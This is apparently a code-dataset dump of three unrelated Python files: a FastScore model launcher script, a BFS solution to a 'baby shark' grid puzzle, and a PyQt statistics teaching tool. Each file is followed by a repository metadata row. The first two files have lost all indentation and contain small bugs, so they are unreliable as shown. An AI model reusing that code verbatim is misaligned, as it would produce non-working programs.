scope = check_scope(x[1]) if len(x) > 1 else default_scope(item)
for s in range(0,MAX_SLOT):
if scope is None:
continue
is_deprecated=False
if (scope == "$all" or
scope == "$in" and is_input_slot(s) or
scope == "$out" and not is_input_slot(s) or
scope == s):
if (item == "recordsets"):
if (value in ["both","none","input","output"]):
# deprecated style
if scope != "$all":
sys.exit("Invalid scope")
is_deprecated=True
if (s == 0 or s == 1):
if (value == "both"):
slots[s]['recordsets'] = True
elif (value == "none"):
slots[s]['recordsets'] = False
elif (value == "input"):
slots[s]['recordsets'] = (s == 0)
elif (value == "output"):
slots[s]['recordsets'] = (s == 1)
else:
# new style
flag = None
if (value == "true" or value == "yes"):
flag = True
elif (value == "false" or value == "no"):
flag = False
else:
sys.exit("Value '{}' not recognized (use 'true', 'false', 'yes', or 'no')".format(value))
slots[s]['recordsets']=flag
elif (item == "action"):
if not is_input_slot(s):
                        sys.exit("An action callback cannot be assigned to an output slot {}".format(s))
slots[s]['action'] = None if (value == "unused") else value
# Any mention of a slot makes it active
if (value != "unused"):
if (not is_deprecated or s == 0 or s == 1):
slots[s]['active'] = True
if (item == "slot"):
if (value != "unused"):
sys.exit("Value '{}' not supported (set to 'unused' to disable the slot)".format(value))
slots[s]['active'] = False
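# Examples of smart comments this parser recognizes (illustrative):
#   # fastscore.recordsets.0: true   -> slot 0 exchanges record sets
#   # fastscore.action.2: action2    -> slot 2 is read by the callback named action2 (slot becomes active)
#   # fastscore.slot.3: unused       -> slot 3 is disabled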
def parse_comments():
slots = []
for s in range(0,MAX_SLOT):
slots.append({
'action': None,
'recordsets': False,
'active': False,
'file': None
})
if is_input_slot(s):
slots[s]['action'] = "action"
# By default, slots 0 and 1 are active
slots[0]['active'] = True
slots[1]['active'] = True
f = open(args.source_file)
for l in f:
parse_comments1(l, slots)
f.close()
return slots
model_slots = parse_comments()
# Collect all data-related options
for k in args.__dict__:
if (k.startswith("input:") or k.startswith("output:")):
s = int(k.split(":")[1])
data_file = args.__dict__[k]
if not data_file is None:
if (is_input_slot(s) and not os.path.isfile(data_file)):
sys.exit("{} not found".format(data_file))
model_slots[s]['file'] = data_file
# Either all or none input slots must have action set
all_actions=True
none_actions=True
for s in range(0,MAX_SLOT):
if (not is_input_slot(s)):
continue
if (model_slots[s]['action'] is None):
all_actions=False
else:
none_actions=False
if (not all_actions and not none_actions):
sys.exit("Either all input slots must have action callbacks set or none of them should")
# Check for dangling slots/files
for s in range(0,MAX_SLOT):
active=model_slots[s]['active']
data_file=model_slots[s]['file']
if (active and data_file is None and s != 0 and s != 1):
sys.exit("Model uses slot {} but there is no data file attached to it".format(s))
if (not active and not data_file is None):
sys.exit("Model does not use slot {} but the data file {} is attached to it".format(s,data_file))
inputs=[]
outputs=[]
for s in range(0,MAX_SLOT):
if not model_slots[s]['active']:
continue
if is_input_slot(s):
inputs.append({
'slot': s,
'seq_no': 1,
'conn': None,
'entry': None
})
else:
outputs.append({
'slot': s,
'conn': None
})
# Open input files
for i in inputs:
s = i['slot']
data_file = model_slots[s]['file']
conn = open(0) if (s == 0 and data_file is None) else open(data_file)
i['conn'] = conn
# Open output files
for i in outputs:
s = i['slot']
data_file = model_slots[s]['file']
conn = open(1,'w') if (s == 1 and data_file is None) else open(data_file,'w')
i['conn'] = conn
# Read a batch of records from the slot
def read_records(s):
ii = None
for i in range(0,len(inputs)):
if inputs[i]['slot'] == s:
ii = i
break
if ii is None:
if model_slots[s]['active']:
return None
else:
sys.exit("Slot {} is not in use".format(s))
conn = inputs[ii]['conn']
seq_no = inputs[ii]['seq_no']
records = []
at_eof = False
while len(records) < args.batch_size:
l = conn.readline()
if len(l) == 0:
if conn.name != 0:
conn.close()
inputs.pop(ii)
at_eof = True
break
x = json.loads(l)
#TODO
#if (is.list(x) && x$`$fastscore` == "set"):
# break
records.append(x)
if at_eof and len(records) == 0:
return []
if not at_eof:
old_seq_no = seq_no
seq_no = seq_no + len(records)
inputs[ii]['seq_no'] = seq_no
return records
def as_recordset(records):
if records is None:
return None
return records
#TODO
#if (len(records) == 0):
# pd.DataFrame(records)
#else:
# head = records[0]
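# Slot wraps one numbered stream: iterating or read() pulls record batches from an
# input slot, while write() emits a record to the matching output slot (as JSON
# lines unless record sets are enabled for that slot).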
class Slot(object):
def __init__(self, n):
self.n = n
def __iter__(self):
return self
def __next__(self):
data = self.read()
if data is None:
raise StopIteration
else:
return data
def read(self):
if (not is_input_slot(self.n)):
sys.exit("Model attempts to explicitly read from an output slot {}".format(self.n))
records = read_records(self.n)
data = as_recordset(records)
return data
def write(self, rec):
if (is_input_slot(self.n)):
sys.exit("Model emits data to an input slot {}:".format(s))
conn = None
for i in outputs:
if i['slot'] == self.n:
conn = i['conn']
break
if conn is None:
sys.exit("Model emits data to an unknown slot {}".format(self.n))
recordsets = model_slots[self.n]['recordsets']
if not recordsets:
print(json.dumps(rec), file=conn)
else:
sys.exit("TOODOO")
fio = types.ModuleType("fastscore.io")
fio.__dict__['Slot'] = Slot
sys.modules["fastscore.io"] = fio
spec = importlib.util.spec_from_file_location('model', args.source_file)
mod = importlib.util.module_from_spec(spec)
# Callbacks not resolved yet
spec.loader.exec_module(mod)
# TODO Check/wrap action callbacks
for s in range(0,MAX_SLOT):
slot = model_slots[s]
if not slot['active']:
continue
if not slot['action'] is None:
entry = getattr(mod, slot['action'], None)
if entry is None:
sys.exit("A slot {} callback function named '{}' not found".format(s,slot['action']))
if not isinstance(entry, types.FunctionType):
sys.exit("A slot {} callback named '{}' must be a function".format(s,slot['action']))
sig = inspect.signature(entry)
arity = len(sig.parameters)
if (arity < 1 or arity > 3):
sys.exit("A slot {} callback function named '{}' must have arity 1, 2, or 3 (not {})".format(s,slot['action'],arity))
wrapped_entry = entry
# Bind entry via a default argument so each slot keeps its own callback
# instead of every lambda closing over the last value of the loop variable.
if arity == 1:
wrapped_entry = lambda data, slot, seqno, entry=entry: entry(data)
elif arity == 2:
wrapped_entry = lambda data, slot, seqno, entry=entry: entry(data, seqno)
for i in inputs:
if i['slot'] == s:
i['entry'] = wrapped_entry
model_uses_callbacks = False
if len(inputs) > 0:
model_uses_callbacks = isinstance(inputs[0]['entry'], types.FunctionType)
if model_uses_callbacks:
while len(inputs) > 0:
# Pick a random slot
select = random.choice(inputs)
s = select['slot']
seq_no = select['seq_no']
records = read_records(s)
action = model_slots[s]['action']
recordsets = model_slots[s]['recordsets']
if recordsets:
sys.exit("TODO recordests")
else:
# Invoke the callback for each record
for rec in records:
print(*select['entry'](rec, s, seq_no)) ## calls 'action'
seq_no = seq_no + 1
| modelop/modelop.github.io | Product Manuals/Model Launchers/Python Launcher/lh.py | lh.py | py | 9,190 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "re.match",
"line_number": 58,
"usage_type": "call"
},
{
"api_name": "re.split",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "sys.exit",
"line_number... |
24788697819 | """
There are several baby sharks in an N×M space. The space is divided into 1×1 square cells, and each cell holds at most one baby shark.
The safety distance of a cell is the distance between that cell and the nearest baby shark. The distance between two cells is the number of cells that must be crossed to get from one to the other, and moves are allowed in the 8 adjacent directions (including diagonals).
Find the cell whose safety distance is the largest.
"""
import sys
from collections import deque
N, M = list(map(int, sys.stdin.readline().strip().split()))
blocks = [[0] * M for _ in range(N)] # blocks
dir = [(0, -1), (-1, -1), (-1, 0), (-1, 1), (0, 1), (1, 1), (1, 0), (1, -1)]
for i in range(N):
blocks[i] = list(map(int, sys.stdin.readline().strip().split()))
def out_of_range(y,x):
return y < 0 or x < 0 or y >= N or x >= M
def solve():
max_val = float("-inf")
for i in range(N):
for j in range(M):
if blocks[i][j] == 0:
# bfs 시작
q = deque()
visited = set()
q.append((i,j, 0))
visited.add((i,j))
dist = 0
while q:
row, col, distance = q.popleft()
# print(row, col, distance)
if blocks[row][col] == 1:
dist = distance
break
for idx in range(8):
next_r, next_c = row + dir[idx][0], col + dir[idx][1]
if out_of_range(next_r, next_c) or (next_r, next_c) in visited:# or (next_r, next_c) in did_shark_test:
continue
q.append((next_r, next_c, distance + 1))
visited.add((next_r,next_c))
max_val = max(max_val, dist)
return max_val
def main():
print(solve())
main() | inhyeokJeon/AALGGO | Python/baekjoon/17086_baby_shark_2.py | 17086_baby_shark_2.py | py | 1,975 | python | ko | code | 0 | github-code | 36 | [
{
"api_name": "sys.stdin.readline",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "sys.stdin",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "sys.stdin.readline",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "sys.stdin",
... |
23269856572 | # import os
import sys
import csv
from matplotlib.patches import Ellipse
import matplotlib.transforms as transforms
# import pandas as pd
# from pandas.plotting import lag_plot
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import *
import random
import matplotlib.pyplot as plt
import numpy as np
from scipy.stats import *
# from scipy.stats.stats import pearsonr
from statsmodels.tsa.arima_process import arma_generate_sample
# from sklearn.metrics import mean_squared_error as MSE
import math
# -- -- #
import distribution_displays
# -- -- #
import functools
import inspect
from typing import Optional
# -- -- #
import Simulation_fit
# -- -- #
from ellipse import confidence_ellipse, get_correlated_dataset
from wave_g import createWave, saveWave, reafWave
class Example(QWidget):
label: list[Optional[list[QLabel]]]
le: list[Optional[list[QLineEdit]]]
intline: list[Optional[list[QLineEdit]]]
pb: list[Optional[list[QPushButton]]]
combobox: list[Optional[QComboBox]]
stack: list[Optional[QWidget]]
sp: list[Optional[QSpinBox]]
group: list[Optional[list[QGroupBox]]]
def __init__(self):
super().__init__()
# -- -- #
self.n_pages = 13
# -- -- #
self.tree = None
self.tree_dict = None
self.stackedWidget = None
self.stack = [None] * self.n_pages
self.le = [None] * self.n_pages
self.var_dict = None
self.groupbox = None
self.link21 = None
self.intline = [None] * self.n_pages
self.sp = [None] * self.n_pages
self.pb = [None] * self.n_pages
self.icon = None
self.label = [None] * self.n_pages
self.filename = None
self.group = [None] * self.n_pages
self.combobox = [None] * self.n_pages
# -- -- #
self.initUI()
'This is the main window,left is tree menu and right part are the stacked windows.'
def initUI(self):
self.setFixedSize(700, 450)
self.setWindowTitle('Tool of SMNt')
self.setStyleSheet("background-color:'silver'")
hbox = QHBoxLayout(self)
left = QFrame(self)
left.setFixedSize(235, 450)
right = QFrame(self)
splitter1 = QSplitter(Qt.Horizontal)
splitter1.setSizes([35, ])
splitter1.addWidget(left)
splitter1.addWidget(right)
hbox.addWidget(splitter1)
self.setLayout(hbox)
self.tree = QTreeWidget(left)
list_00 = [self.tree.setMinimumSize, self.tree.setStyleSheet, self.tree.setAutoScroll,
self.tree.setEditTriggers, self.tree.setTextElideMode, self.tree.setRootIsDecorated,
self.tree.setUniformRowHeights, self.tree.setItemsExpandable, self.tree.setAnimated,
self.tree.setHeaderHidden, self.tree.setExpandsOnDoubleClick, self.tree.setObjectName]
list_01 = [[35, 450], ["background-color:'silver';border:outset;color:seagreen;font:bold;font-size:15px"],
[True], [QAbstractItemView.DoubleClicked | QAbstractItemView.EditKeyPressed], [Qt.ElideMiddle],
[True], [False], [True], [False], [True], [True], ["tree"]]
for i, j in zip(list_00, list_01):
i(*j)
self.tree_dict = {}
list_02 = ["root", "root1", "root2", "root3", "child11", "child12", "child13", "child14", "child21", "child22",
"child25", "child31", "child32", "child33"]
list_03 = [None, None, None, None, "root1", "root1", "root1", "root1", "root2",
"root2", "root2", "root3", "root3", "root3"]
list_04 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
list_05 = ['HomePage', 'Probability', 'Correlation Function', 'Estimation Function', 'Coin Flipping',
'Dice Throw', 'Distribution Simulation', 'Central Limit Theorem', 'Correlation Coefficient',
'Correlation Function', 'AR Model', 'Maximum likelihood', 'confidence ellipse', "waveforms"]
for i, j, k, l in zip(list_02, list_03, list_04, list_05):
if j is None:
self.tree_dict[i] = QTreeWidgetItem(self.tree)
else:
self.tree_dict[i] = QTreeWidgetItem(self.tree_dict[j])
self.tree_dict[i].setText(k, l)
self.tree.addTopLevelItem(self.tree_dict["root"])
self.stackedWidget = QStackedWidget(right)
self.stack = [QWidget() for i in range(13)]
for func in [self.stackUI0, self.stackUI1, self.stackUI2, self.stackUI3, self.stackUI4, self.stackUI5,
self.stackUI6, self.stackUI7, self.stackUI8, self.stackUI9, self.stackUI10, self.stackUI11,
self.stackUI12]:
func()
for i in range(len(self.stack)):
self.stackedWidget.addWidget(self.stack[i])
self.tree.clicked.connect(self.Display)
'Change the stacked windows.'
def Display(self):
item = self.tree.currentItem()
switcher = {
"HomePage": 0,
"Coin Flipping": 1,
"Dice Throw": 2,
"Distribution Simulation": 3,
"Central Limit Theorem": 4,
"Correlation Coefficient": 5,
"Correlation Function": 6,
"AR Model": 9,
"Maximum likelihood": 10,
"confidence ellipse": 11,
"waveforms": 12
}
i = switcher.get(item.text(0), None)
if i is not None:
self.stackedWidget.setCurrentIndex(i)
'----------------Homepage------------------------------'
def stackUI0(self):
layout = QVBoxLayout(self.stack[0])
self.label[0] = [QLabel()]
self.label[0][0].setText("Statistische Methoden \nder Nachrichtentechnik\nVer.1.0")
self.label[0][0].setSizePolicy(QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding))
self.label[0][0].setAlignment(Qt.AlignCenter)
self.label[0][0].setFont(QFont("Sanserif", 15, QFont.Bold))
layout.addWidget(self.label[0][0])
'---------------------Coin----------------------------'
def stackUI1(self):
vlayout = QVBoxLayout(self.stack[1])
gridlayout = QGridLayout()
grid = QWidget()
grid.setLayout(gridlayout)
vlayout.addWidget(grid)
self.le[1] = [QLineEdit() for i in range(2)]
self.var_dict = {}
list_00 = ["pb1_2", "pb1_1", "help"]
list_01 = ["Execute", "Clear", "Help"]
list_02 = [self.coin, self.clear11, self.msg1]
for i, j, k in zip(list_00, list_01, list_02):
self.var_dict[i] = QPushButton(j)
self.var_dict[i].clicked.connect(k)
for i, j in zip(["label11", "label12"], ["Times:", "Probability:"]):
self.var_dict[i] = QLabel()
self.var_dict[i].setText(j)
list_03 = [self.var_dict["help"], self.var_dict["label11"], self.var_dict["label12"], *self.le[1],
self.var_dict["pb1_2"], self.var_dict["pb1_1"]]
list_04 = [1, 2, 3, 2, 3, 4, 5]
list_05 = [2, 0, 0, 1, 1, 2, 2]
for i in zip(list_03, list_04, list_05):
gridlayout.addWidget(*i)
def msg1(self):
QMessageBox.about(self, "Help", "This function is a simulator of coin flipping.\n"
"Input the number of flipping times and the probability of head.\n"
"The simulator will generate a graphic of probability change polyline.\n"
"Can generate multiple images simultaneously.")
def coin(self):
try:
times = []
frequency = []
n_heads = 0
n_instances = 0
number = int(self.le[1][0].text())
probability = float(self.le[1][1].text())
'When the number of trials is smaller than 100, we need a solid sampling interval'
for flip_num in range(0, number):
if random.random() <= probability:
n_heads += 1
n_instances += 1
frequency.append(n_heads / n_instances)
times.append(n_instances)
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot(times, frequency, color='b', label='(actual) relative occurrence')
ax.set_xlabel('Number of Trials')
ax.set_ylabel('Frequency')
ax.set_ylim([0, 1])
ax.set_xlim([1, number])
'The red line marks the theoretical probability of heads'
ax.plot([-0, number], [probability, probability], label='Theoretical Probability', color='r',
linewidth='1.5')
ax.legend(loc=0)
plt.title('{} times Flip with Probability p(head)= {} '.format(number, probability))
plt.grid(axis='y')
plt.show()
except:
self.Error()
def clear11(self, index=1):
for i in self.le[index]:
i.clear()
'---------------------Dice----------------------------'
def stackUI2(self):
vlayout = QVBoxLayout(self.stack[2])
gridlayout = QGridLayout()
gridlayout2 = QGridLayout()
grid = QWidget()
grid2 = QWidget()
grid.setLayout(gridlayout)
grid2.setLayout(gridlayout2)
self.groupbox = QGroupBox('5 Platonic Solids', self)
self.groupbox.setLayout(gridlayout)
self.link21 = QLabel()
self.link21.setOpenExternalLinks(True)
self.link21.setText(u'<a href="https://en.wikipedia.org/wiki/Platonic_solid" style="color:#0000ff;">'
u'<b>Wikipedia</b></a>')
self.link21.setStyleSheet('font-size: 11px')
self.intline[2] = [QLineEdit() for i in range(3)]
self.pb[2] = []
self.icon = {}
list_00 = ["1", "2", "3", "4", "5"]
list_01 = ["4.png", "6.png", "8.png", "12.png", "20.png"]
list_02 = ["4", "6", "8", "12", "20"]
list_03 = ["Tetrahedron 4 faces", "Cube 6 faces", "Octahedron 8 faces", "Dodecahedron 12 faces",
"Icosahedron 20 faces"]
for j, k, l, m in zip(list_00, list_01, list_02, list_03):
self.pb[2].append(QPushButton())
self.icon[j] = QIcon()
self.icon[j].addPixmap(QPixmap(k), QIcon.Normal, QIcon.Off)
self.pb[2][-1].setIcon(self.icon[j])
self.pb[2][-1].setIconSize(QSize(50, 50))
self.pb[2][-1].clicked.connect(functools.partial(self.intline[2][1].setText, l))
self.pb[2][-1].setToolTip(m)
for j, k in zip(["Help", "Execute", "Clear"], [self.msg2, self.dice_simulation, self.clear21]):
self.pb[2].append(QPushButton(j))
self.pb[2][-1].clicked.connect(k)
self.label[2] = [QLabel(text) for text in ["Number of dice:", "Faces of dice:", "Throw times:"]]
list_07 = [*self.pb[2][:5], self.link21, *self.pb[2][5:], *self.intline[2], *self.label[2]]
list_08 = [2, 2, 2, 2, 2, 3, 1, 5, 6, 2, 3, 4, 2, 3, 4]
list_09 = [0, 1, 2, 3, 4, 4, 2, 2, 2, 1, 1, 1, 0, 0, 0]
for i in zip(list_07[:6], list_08[:6], list_09[:6]):
gridlayout.addWidget(*i)
for i in zip(list_07[6:], list_08[6:], list_09[6:]):
gridlayout2.addWidget(*i)
vlayout.addWidget(self.groupbox)
vlayout.addWidget(grid2)
def clear21(self, index=2):
for i in self.intline[index]:
i.clear()
def msg2(self):
QMessageBox.about(self, "Help", "This function is a simulator of dice throw .\n"
"The simulator will generate a graphic of probability distribution.\n"
"Can generate multiple images simultaneously.")
def dice_simulation(self):
try:
number, face, time = [int(i.text()) for i in self.intline[2]]
list_dice = np.arange(1, face + 1)
# result = [sum(random.choices(list_dice, k=10)) for i in range(time)]
result = [sum(random.choices(list_dice, k=number)) for i in range(time)]
fig = plt.figure()
ax = fig.add_subplot(111)
'This choice of bins makes the histogram easier to read'
# histo = ax.hist(result, color='RoyalBlue', bins=np.arange((face-1) * number + 4)-0.5, label='occurrence')
histo = ax.hist(result, color='RoyalBlue', bins=np.arange(face * number + 2) - 0.5, label='occurrence')
ax.set_xlim([number - 1, number * face + 1])
ax.set_xlabel('Dice Points')
ax.set_ylabel('total occurence')
ax.legend(loc=1)
plt.title('{} times Toss {} dice each has {} faces'.format(time, number, face))
plt.grid()
plt.show()
except:
self.Error()
'-----------------Distribution-------------------------'
def stackUI3(self):
layout = QVBoxLayout()
glayout = QGridLayout()
gbox = QWidget()
gbox.setLayout(glayout)
self.combobox[3] = QComboBox()
font31 = QFont()
font31.setPointSize(16)
self.combobox[3].setFont(font31)
list_00 = ["Please select...", "Beta_Distribution", "Binomial_Distribution", "Cauchy_Distribution",
"Chi2_Distribution", "Expon_Distribution", "F_Distribution", "Gamma_Distribution",
"Geometric_Distribution", "Laplace_Distribution", "Logistic_Distribution", "Lomax_Distribution",
"Lognorm_Distribution", "Negative_Binomial_Distribution", "Normal_Distribution",
"Poisson_Distribution", "Rayleigh_Distribution", "T_Distribution", "Weibull_Distribution",
"Zipf_Distribution"]
for i in list_00:
self.combobox[3].addItem(i)
self.combobox[3].currentIndexChanged.connect(self.Select_onChange31)
self.le[3] = [QLineEdit() for i in range(2)]
self.label[3] = [QLabel()] + [QLabel(text) for text in [" ", "1. parameter:", "2. parameter:"]]
self.label[3][1].setFont(QFont('Sanserif', 15))
self.label[3][1].setStyleSheet("font:bold")
self.pb[3] = []
for i, j in zip(['Execute', 'Clear', 'Help'], [self.Select_onChange32, self.clear31, self.msg3]):
self.pb[3].append(QPushButton(i))
self.pb[3][-1].clicked.connect(j)
for i in [self.combobox[3], *self.label[3][:2], gbox]:
layout.addWidget(i)
list_00 = [*self.label[3][2:], *self.le[3], *self.pb[3]]
list_01 = [1, 2, 1, 2, 2, 3, 1]
list_02 = [0, 0, 1, 1, 2, 2, 2]
for i in zip(list_00, list_01, list_02):
glayout.addWidget(*i)
self.stack[3].setLayout(layout)
def clear31(self, index=3):
for i in self.le[index]:
i.clear()
def msg3(self):
QMessageBox.about(self, "Help", "This function is a simulator of general distributions.\n"
"The simulator will generate a graphic of probability distribution.\n"
"Inputboxes support multiple sets of parameters like '0.5,0.7,1.0'")
def Select_onChange31(self):
switcher = {
"Binomial_Distribution": ["binomial.svg", [200, 60], 'n={}\n' 'p={}'],
"Normal_Distribution": ["normal.svg", [200, 60], 'μ={}\n' 'σ²={}'],
"Poisson_Distribution": ["poisson.svg", [250, 70], 'λ={}'],
"Rayleigh_Distribution": ["rayleigh.svg", [250, 60], 'σ={}'],
"Beta_Distribution": ["Beta.svg", [200, 60], 'α={}\n' 'β={}'],
"F_Distribution": ["f.svg", [450, 350], 'd1={}\n' 'd2={}'],
"Gamma_Distribution": ["gamma2.svg", [300, 50], 'k={} θ={}'],
"Geometric_Distribution": ["geometric.svg", [290, 60], 'p={}'],
"Lognorm_Distribution": ["lognorm.svg", [250, 60], 'μ={}\n' 'σ={}'],
"Chi2_Distribution": ["chi2.svg", [300, 140], 'df={}'],
"Cauchy_Distribution": ["cauchy.svg", [350, 80], 'x0={}\n' 'γ={}'],
"Laplace_Distribution": ["laplace.svg", [200, 60], 'μ={}\n' 'λ={}'],
"T_Distribution": ["t.svg", [300, 90], 'v={}'],
"Expon_Distribution": ["exponential.svg", [200, 60], 'λ={}'],
"Weibull_Distribution": ["weibull.svg", [350, 80], 'λ={}\n' 'a={}'],
"Negative_Binomial_Distribution": ["negativ.svg", [300, 60], 'n={}\n' 'p={}'],
"Lomax_Distribution": ["lomax.svg", [250, 60], 'λ={}\n' 'α={}'],
"Logistic_Distribution": ["logistic.svg", [300, 170], 'μ={}\n' 's={}']
}
if self.combobox[3].currentText() == 'Please select...':
self.label[3][0].setText(' ')
self.label[3][1].setText(' ')
elif self.combobox[3].currentText() == 'Zipf_Distribution':
self.label[3][0].setText('No pic')
self.label[3][0].setScaledContents(True)
self.label[3][0].setMaximumSize(200, 60)
self.label[3][1].setText('a={}')
else:
i = switcher.get(self.combobox[3].currentText(), None)
self.label[3][0].setPixmap(QPixmap(i[0]))
self.label[3][0].setScaledContents(True)
self.label[3][0].setMaximumSize(*i[1])
self.label[3][1].setText(i[2])
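# _decorator wraps a distribution_displays function: it reads one comma-separated
# list of values per expected argument from the parameter line edits, checks that
# the lists have equal length, and calls the wrapped function with those lists.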
def _decorator(self, func):
def inner(*args, **kwargs):
try:
n_args = len(inspect.getfullargspec(func).args)
sp = [self.le[3][i].text().split(',') for i in range(n_args)]
if len(sp) > 1 and not all(len(sp[0]) == len(x) for x in sp[1:]):
QMessageBox.about(self, "Warning", "The length of the two rows is not the same.")
else:
func(*sp, *args, **kwargs)
except:
self.Error()
return inner
def Select_onChange32(self):
switcher = {
"Binomial_Distribution": self._decorator(distribution_displays.Binomial_Distribution),
"Normal_Distribution": self._decorator(distribution_displays.Normal_Distribution),
"Poisson_Distribution": self._decorator(distribution_displays.Poisson_Distribution),
"Rayleigh_Distribution": self._decorator(distribution_displays.Rayleigh_Distribution),
"Beta_Distribution": self._decorator(distribution_displays.Beta_Distribution),
"F_Distribution": self._decorator(distribution_displays.F_Distribution),
"Gamma_Distribution": self._decorator(distribution_displays.Gamma_Distribution),
"Geometric_Distribution": self._decorator(distribution_displays.Geometric_Distribution),
"Lognorm_Distribution": self._decorator(distribution_displays.Lognorm_Distribution),
# "Uniform_Distribution": self._decorator(distribution_displays.Uniform_Distribution),
"Chi2_Distribution": self._decorator(distribution_displays.Chi2_Distribution),
"Cauchy_Distribution": self._decorator(distribution_displays.Cauchy_Distribution),
"Laplace_Distribution": self._decorator(distribution_displays.Laplace_Distribution),
"T_Distribution": self._decorator(distribution_displays.T_Distribution),
"Expon_Distribution": self._decorator(distribution_displays.Expon_Distribution),
"Weibull_Distribution": self._decorator(distribution_displays.Weibull_Distribution),
"Zipf_Distribution": self._decorator(distribution_displays.Zipf_Distribution),
"Negative_Binomial_Distribution": self._decorator(distribution_displays.Negative_Binomial_Distribution),
"Lomax_Distribution": self._decorator(distribution_displays.Lomax_Distribution),
"Logistic_Distribution": self._decorator(distribution_displays.Logistic_Distribution)
}
switcher.get(self.combobox[3].currentText(), lambda: None)()
def Error(self):
QMessageBox.about(self, 'Warning', 'Error happened!\n'
'please check parameters!')
'----------------------Central Limit Theorem----------------------------'
def stackUI4(self):
layout = QVBoxLayout()
layout1 = QGridLayout()
hbox1 = QWidget()
hbox1.setLayout(layout1)
self.pb[4] = [QPushButton(text) for text in ['Execute', 'Help', 'Clear']]
self.le[4] = [QLineEdit() for i in range(2)]
self.label[4] = [QLabel(text) for text in ['Number of dice:', 'Number of times:', 'Central limit theorem']]
self.label[4][2].setStyleSheet(
"background-color:'RoyalBlue';border:outset;color:'yellow';font:bold;font-size:20px"
)
self.label[4][2].setAlignment(Qt.AlignCenter)
self.label[4][2].setGeometry(20, 30, 600, 300)
list_00 = [*self.label[4][:2], *self.le[4], *self.pb[4]]
list_01 = [2, 3, 2, 3, 4, 1, 5]
list_02 = [0, 0, 1, 1, 2, 2, 2]
for i in zip(list_00, list_01, list_02):
layout1.addWidget(*i)
layout.addWidget(self.label[4][2])
layout.addWidget(hbox1)
for i, j in zip(self.pb[4], [self.CentralLimitTheorem, self.msg4, self.clear41]):
i.clicked.connect(j)
self.stack[4].setLayout(layout)
def clear41(self, index=4):
for i in self.le[index]:
i.clear()
def msg4(self):
QMessageBox.about(self, 'Help', 'The more dice and the more throws, the closer the histogram'
' gets to the normal distribution')
def CentralLimitTheorem(self):
try:
number = int(self.le[4][0].text())
times = int(self.le[4][1].text())
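# For one fair six-sided die E[X] = 3.5 and Var[X] = 35/12, so the sum of
# `number` dice has mean 3.5*number and variance (35/12)*number; these
# parametrize the normal curve overlaid on the histogram below.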
mu = 3.5 * number
sigma = (35 / 12) * number
x = np.arange(1 * number - 1, 6 * number + 1, 0.1)
y = norm.pdf(x, loc=mu, scale=math.sqrt(sigma))
samples_sum = []
for i in range(times):
sample = np.random.randint(1, 7, size=number)
sum = np.sum(sample)
samples_sum.append(sum)
fig = plt.figure(tight_layout=True)
ax = fig.add_subplot(111)
ax.hist(samples_sum, bins=np.arange(4 + 5 * number) - 0.5, density=True, color='RoyalBlue', alpha=0.9,
label='relative occurrence')
ax.set_xlabel('Dice Points')
ax.set_ylabel('relative occurence')
ax.set_xlim([number - 2, number * 6 + 2])
ax.legend(loc=2)
ax2 = ax.twinx()
ax2.plot(x, y, label='Theoretical Value', color='r')
ax2.legend(loc=1)
ax2.set_ylabel('Probability')
ax2.set_ylim(ymin=0)
plt.title('{} dice {} throws'.format(number, times))
ax2.set_ylim(ax.get_ylim())
plt.grid()
plt.show()
except:
self.Error()
'---------------------------Correlation example-------------------------------------------------'
def stackUI5(self):
layout = QVBoxLayout()
layout_i = [QGridLayout() for i in range(2)]
hlayout = QHBoxLayout()
hbox = QWidget()
hbox.setLayout(hlayout)
self.label[5] = [QLabel(text) for text in ['Title precision:', 'x.xx']]
self.sp[5] = QSpinBox()
self.sp[5].setValue(2)
self.sp[5].setMinimum(0)
self.sp[5].setSingleStep(1)
self.sp[5].valueChanged.connect(functools.partial(lambda x: x.label[5][1].setText("x." + x.sp[5].value() * "x"),
self))
for i in [*self.label[5], self.sp[5]]:
hlayout.addWidget(i)
group = [QGroupBox(text, self) for text in ['Example', 'Input Data']]
for i, j in zip(group, layout_i):
i.setLayout(j)
for i in [hbox, *group]:
layout.addWidget(i)
self.pb[5] = [QPushButton(text) for text in
['Weak correlation', 'Strong correlation', 'Uncorrelated', 'AddFile']]
list_00 = [0, 0, 0, 1]
list_01 = [1, 1, 1, 1]
list_02 = [0, 1, 2, 0]
list_03 = [self.Weak_correlation, self.Strong_correlation, self.Uncorrelated, self.Openfile_coe]
for i, j, *k, l in zip(list_00, self.pb[5], list_01, list_02, list_03):
layout_i[i].addWidget(j, *k)
j.clicked.connect(l)
self.stack[5].setLayout(layout)
def Valuechange51(self): # In my opinion 3 levels are enough
self.label[5][1].setText("x." + self.sp[5].value() * "x")
def base_correlation(self, func):
try:
x = np.arange(1, 101)
y = func(x)
coefxy = np.corrcoef(x, y)
pxy = coefxy[0, 1]
res = linregress(x, y)
y1 = res.intercept + np.multiply(res.slope, x)
plt.plot(x, y, marker='o', linestyle='None')
plt.plot(x, y1, c='r', label='fitted line')
plt.xlabel('x')
plt.ylabel('y')
plt.title(f"r = {pxy:.{self.sp[5].value()}f} Fitted line: y = {res.intercept:.{self.sp[5].value()}f}"
f" + {res.slope:.{self.sp[5].value()}f} * x")
plt.grid()
plt.legend()
plt.show()
except:
self.Error()
def Weak_correlation(self):
self.base_correlation(lambda x: np.random.randn(100) * 350 + np.random.randint(-10, 10, 1) * x)
def Strong_correlation(self):
self.base_correlation(lambda x: np.random.randn(100) * 50 + np.random.randint(-10, 10, 1) * x)
def Uncorrelated(self):
x0 = np.linspace(-1, 1, 200) # Draw a circle in polar coordinates
y0 = np.sqrt(1 - x0 ** 2)
list1 = []
list2 = []
for i in range(200):
a = (-1) ** random.randint(0, 1)
b = random.random() * 0.1
list1.append(a)
list2.append(b)
y1 = np.multiply(y0, list1)
list3 = np.array(list2)
y2 = y1 + list3
coefxy = np.corrcoef(x0, y2)
pxy = coefxy[0, 1]
plt.plot(x0, y2, marker='o', linestyle='None')
plt.xlabel('x')
plt.ylabel('y')
plt.title(f"r = {pxy:.{self.sp[5].value()}f} No fitted line")
plt.grid()
plt.show()
